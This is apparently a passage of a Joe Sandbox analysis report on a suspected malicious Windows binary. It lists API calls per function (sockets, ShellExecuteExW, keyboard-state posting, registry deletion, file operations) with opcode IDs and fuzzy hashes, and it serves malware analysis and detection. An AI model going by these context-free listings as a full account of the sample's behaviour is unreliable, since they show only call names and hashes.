                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CriticalExchangeFileInterlockedReadSection_memmove$EnterException@8LeaveThrowstd::exception::exception
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 256516436-0
                                                                                                                                                  • Opcode ID: 018c4ff2442bdeeb833c233aee01cbefa1d75c6b59dffdef8a5d4bd758a3c7f1
                                                                                                                                                  • Instruction ID: 188a4d0b29229593a2b146342a062b1bd5409cf6fda6c026f11dbcde1a99e618
                                                                                                                                                  • Opcode Fuzzy Hash: 018c4ff2442bdeeb833c233aee01cbefa1d75c6b59dffdef8a5d4bd758a3c7f1
                                                                                                                                                  • Instruction Fuzzy Hash: F131A131A00215EBCF00DFA5DC85AAFB7B8EF45714F1441BAF9049B246EB349E14CBA9
                                                                                                                                                  APIs
                                                                                                                                                  • DeleteObject.GDI32(00000000), ref: 004861EB
                                                                                                                                                  • GetDC.USER32(00000000), ref: 004861F3
                                                                                                                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004861FE
                                                                                                                                                  • ReleaseDC.USER32(00000000,00000000), ref: 0048620A
                                                                                                                                                  • CreateFontW.GDI32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000001,00000004,00000000,?,00000000,?), ref: 00486246
                                                                                                                                                  • SendMessageW.USER32(?,00000030,00000000,00000001), ref: 00486257
                                                                                                                                                  • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,0048902A,?,?,000000FF,00000000,?,000000FF,?), ref: 00486291
                                                                                                                                                  • SendMessageW.USER32(?,00000142,00000000,00000000), ref: 004862B1
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSend$CapsCreateDeleteDeviceFontMoveObjectReleaseWindow
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3864802216-0
                                                                                                                                                  • Opcode ID: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                  • Instruction ID: f4278305449edce2f76c410d332ec57268d6ee35a6a277c822a0a6189647fcfb
                                                                                                                                                  • Opcode Fuzzy Hash: cf317ad195164d60a9274800805a8c3d798bcd83c3ff523b59fa5e1fadae3bb4
                                                                                                                                                  • Instruction Fuzzy Hash: 46317172101210BFEB115F50DC4AFEB3BADEF49755F0540A9FE08AA291D6759C41CB68
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
                                                                                                                                                    • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
                                                                                                                                                    • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
                                                                                                                                                  • _wcstok.LIBCMT ref: 0046EC94
                                                                                                                                                  • _wcscpy.LIBCMT ref: 0046ED23
                                                                                                                                                  • _memset.LIBCMT ref: 0046ED56
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                                                                                                                  • String ID: X
                                                                                                                                                  • API String ID: 774024439-3081909835
                                                                                                                                                  • Opcode ID: c91ed4c1db3eaf160e6426a3c9cbafba05b6d1eebd81997a596445fd3a2e4ee9
                                                                                                                                                  • Instruction ID: da02439699827519884de0a837ef4d7055a253f99ddb834d536b4edba3b8eab3
                                                                                                                                                  • Opcode Fuzzy Hash: c91ed4c1db3eaf160e6426a3c9cbafba05b6d1eebd81997a596445fd3a2e4ee9
                                                                                                                                                  • Instruction Fuzzy Hash: E1C161756083019FD714EF25D841A5AB7E4FF85318F10492EF899A72A2EB38EC45CB4B
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                  • Instruction ID: a887e684d243743618d1057532b585a7ad503945d0d011121e70032f0d2e3d72
                                                                                                                                                  • Opcode Fuzzy Hash: 5023a88ac2a4e028a815ef4d4db6f605c18ba5c71fdc3231c60cda9a6e4bf417
                                                                                                                                                  • Instruction Fuzzy Hash: 85715F30900109EFDB04DF95CC89EBF7B75FF85314F14816AF915AA2A1C738AA51CBA9
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID:
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID:
                                                                                                                                                  • Opcode ID: 1dc866799483a1f68d16bd5c587667066af38cf8e711f2f009e96328f63279f3
                                                                                                                                                  • Instruction ID: 46b4ac146fbb0665a2833e9d76511dd6af63fa3af31f170c7a92b4824a30796f
                                                                                                                                                  • Opcode Fuzzy Hash: 1dc866799483a1f68d16bd5c587667066af38cf8e711f2f009e96328f63279f3
                                                                                                                                                  • Instruction Fuzzy Hash: 4561C871204700AFC710EB25CC41EAFB7A9EF84718F40892EF545A72D2DB38AD05C75A
                                                                                                                                                  APIs
                                                                                                                                                  • IsWindow.USER32(00B834B0), ref: 0048B3EB
                                                                                                                                                  • IsWindowEnabled.USER32(00B834B0), ref: 0048B3F7
                                                                                                                                                  • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0048B4DB
                                                                                                                                                  • SendMessageW.USER32(00B834B0,000000B0,?,?), ref: 0048B512
                                                                                                                                                  • IsDlgButtonChecked.USER32(?,?), ref: 0048B54F
                                                                                                                                                  • GetWindowLongW.USER32(00B834B0,000000EC), ref: 0048B571
                                                                                                                                                  • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0048B589
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4072528602-0
                                                                                                                                                  • Opcode ID: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                  • Instruction ID: 3cfba568ea5790526d5b286793119b4d477072028a14d6832b16bbf893ccb4d1
                                                                                                                                                  • Opcode Fuzzy Hash: af34dbccf799c1c6a714d1a93faded036c611a6d887c638bd2f6846a6a243747
                                                                                                                                                  • Instruction Fuzzy Hash: 9B71BF34601604EFDB21AF54CC95FBF7BA9EF09700F14486EE941973A2C739A891DB98
APIs
• _memset.LIBCMT ref: 0047F448
• _memset.LIBCMT ref: 0047F511
• ShellExecuteExW.SHELL32(?), ref: 0047F556
  • Part of subcall function 00409837: __itow.LIBCMT ref: 00409862
  • Part of subcall function 00409837: __swprintf.LIBCMT ref: 004098AC
  • Part of subcall function 0041FC86: _wcscpy.LIBCMT ref: 0041FCA9
• GetProcessId.KERNEL32(00000000), ref: 0047F5CD
• CloseHandle.KERNEL32(00000000), ref: 0047F5FC
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
• String ID: @
• API String ID: 3522835683-2766056989
APIs
• GetParent.USER32(?), ref: 00460F8C
• GetKeyboardState.USER32(?), ref: 00460FA1
• SetKeyboardState.USER32(?), ref: 00461002
• PostMessageW.USER32(?,00000101,00000010,?), ref: 00461030
• PostMessageW.USER32(?,00000101,00000011,?), ref: 0046104F
• PostMessageW.USER32(?,00000101,00000012,?), ref: 00461095
• PostMessageW.USER32(?,00000101,0000005B,?), ref: 004610B8
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetParent.USER32(00000000), ref: 00460DA5
• GetKeyboardState.USER32(?), ref: 00460DBA
• SetKeyboardState.USER32(?), ref: 00460E1B
• PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00460E47
• PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00460E64
• PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00460EA8
• PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00460EC9
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: MessagePost$KeyboardState$Parent
• String ID:
• API String ID: 87235514-0
APIs
• GetConsoleCP.KERNEL32(?,00000000,?,?,?,?,?,?,?,00AB8311,?,00000000,?,00000000,00000000), ref: 00AB7BDE
• __fassign.LIBCMT ref: 00AB7C59
• __fassign.LIBCMT ref: 00AB7C74
• WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000001,?,00000005,00000000,00000000), ref: 00AB7C9A
• WriteFile.KERNEL32(?,?,00000000,00AB8311,00000000,?,?,?,?,?,?,?,?,?,00AB8311,?), ref: 00AB7CB9
• WriteFile.KERNEL32(?,?,00000001,00AB8311,00000000,?,?,?,?,?,?,?,?,?,00AB8311,?), ref: 00AB7CF2
Memory Dump Source
• Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_a70000_x.jbxd
Similarity
• API ID: FileWrite__fassign$ByteCharConsoleMultiWide
• String ID:
• API String ID: 1324828854-0
APIs
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: _wcsncpy$LocalTime
• String ID:
• API String ID: 2945705084-0
APIs
• CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0045D5D4
• SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0045D60A
• GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0045D61B
• SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0045D69D
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_1_2_400000_x.jbxd
Similarity
• API ID: ErrorMode$AddressCreateInstanceProc
• String ID: ,,I$DllGetClassObject
• API String ID: 753597075-1683996018
APIs
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00463697,?), ref: 0046468B
  • Part of subcall function 0046466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00463697,?), ref: 004646A4
• lstrcmpiW.KERNEL32(?,?), ref: 004636B7
• _wcscmp.LIBCMT ref: 004636D3
• MoveFileW.KERNEL32(?,?), ref: 004636EB
• _wcscat.LIBCMT ref: 00463733
• SHFileOperationW.SHELL32(?), ref: 0046379F
Strings
Memory Dump Source
• Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                                                  • String ID: \*.*
                                                                                                                                                  • API String ID: 1377345388-1173974218
                                                                                                                                                  • Opcode ID: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                                                                                  • Instruction ID: 4e874dc4fae4897927e7b4621483e23afab501f30efb2571b7469179fc3cc0d5
                                                                                                                                                  • Opcode Fuzzy Hash: 3f0f69ac01daa6019ea7883590d89e46cbcf260a567c4b816384ba6a57f53713
                                                                                                                                                  • Instruction Fuzzy Hash: 1A418FB1508344AEC752EF65D4419DFB7E8AF88345F40082FB48AC3261FA38D689C75B
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 004872AA
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00487351
                                                                                                                                                  • IsMenu.USER32(?), ref: 00487369
                                                                                                                                                  • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 004873B1
                                                                                                                                                  • DrawMenuBar.USER32 ref: 004873C4
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                                                  • String ID: 0
                                                                                                                                                  • API String ID: 3866635326-4108050209
                                                                                                                                                  • Opcode ID: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                  • Instruction ID: fcd3fc1e0e94e91f8146e9bbeff2772ee04bbaba0065c2a20de26dc7b403efd4
                                                                                                                                                  • Opcode Fuzzy Hash: 0ee1f44b2a5140251d286675eb963f933f852416e711f3c94e98620d4ff88054
                                                                                                                                                  • Instruction Fuzzy Hash: AA411675A04208AFDB20EF50D894A9EBBB4FB04350F24882AFD15A7360D734ED64EB65
                                                                                                                                                  APIs
                                                                                                                                                  • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00480FD4
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00480FFE
                                                                                                                                                  • FreeLibrary.KERNEL32(00000000), ref: 004810B5
                                                                                                                                                    • Part of subcall function 00480FA5: RegCloseKey.ADVAPI32(?), ref: 0048101B
                                                                                                                                                    • Part of subcall function 00480FA5: FreeLibrary.KERNEL32(?), ref: 0048106D
                                                                                                                                                    • Part of subcall function 00480FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00481090
                                                                                                                                                  • RegDeleteKeyW.ADVAPI32(?,?), ref: 00481058
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 395352322-0
                                                                                                                                                  • Opcode ID: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                  • Instruction ID: 3e22e70b6f2616eb7250a30d7d8a48524582d6e50c9a57dc89dcd50e66651605
                                                                                                                                                  • Opcode Fuzzy Hash: b5131dabd4a2a67cadfd2e986b415e323ff756628087c751aedefec5cbf298fe
                                                                                                                                                  • Instruction Fuzzy Hash: E2311D71900109BFDB15AF90DC89EFFB7BCEF09300F10096BE501E2251D6745E8A9BA9
                                                                                                                                                  APIs
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 004862EC
                                                                                                                                                  • GetWindowLongW.USER32(00B834B0,000000F0), ref: 0048631F
                                                                                                                                                  • GetWindowLongW.USER32(00B834B0,000000F0), ref: 00486354
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00486386
                                                                                                                                                  • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 004863B0
                                                                                                                                                  • GetWindowLongW.USER32(00000000,000000F0), ref: 004863C1
                                                                                                                                                  • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 004863DB
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: LongWindow$MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 2178440468-0
                                                                                                                                                  • Opcode ID: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                  • Instruction ID: de0077e50bd3e6fac1d65856e76e1ec94ed34838b8122e9b1a950ed70c11c10c
                                                                                                                                                  • Opcode Fuzzy Hash: b6c63574b2784a6fe8e125d212b22f8229395cc3faf42e06ca4ca63f68dab27c
                                                                                                                                                  • Instruction Fuzzy Hash: 2B3125306001509FDB61EF18EC84F6E37E1FB4A714F1A05B9F9009F2B1CB75A8849B59
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00477D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00477DB6
                                                                                                                                                  • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 004761C6
                                                                                                                                                  • WSAGetLastError.WSOCK32(00000000), ref: 004761D5
                                                                                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0047620E
                                                                                                                                                  • connect.WSOCK32(00000000,?,00000010), ref: 00476217
                                                                                                                                                  • WSAGetLastError.WSOCK32 ref: 00476221
                                                                                                                                                  • closesocket.WSOCK32(00000000), ref: 0047624A
                                                                                                                                                  • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00476263
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 910771015-0
                                                                                                                                                  • Opcode ID: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                  • Instruction ID: 9a8db824e4f103e753759010288aef610dd859574b1bdde890bb221953e34ba6
                                                                                                                                                  • Opcode Fuzzy Hash: 2c772d8cd10b281ebb58c123377a2f6f77deb8af44f3e8561ff8297571aede33
                                                                                                                                                  • Instruction Fuzzy Hash: E131C671600104ABDF10BF64CC85BBE77ADEB45714F05846EFD09A7292DB78AC088B65
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmp
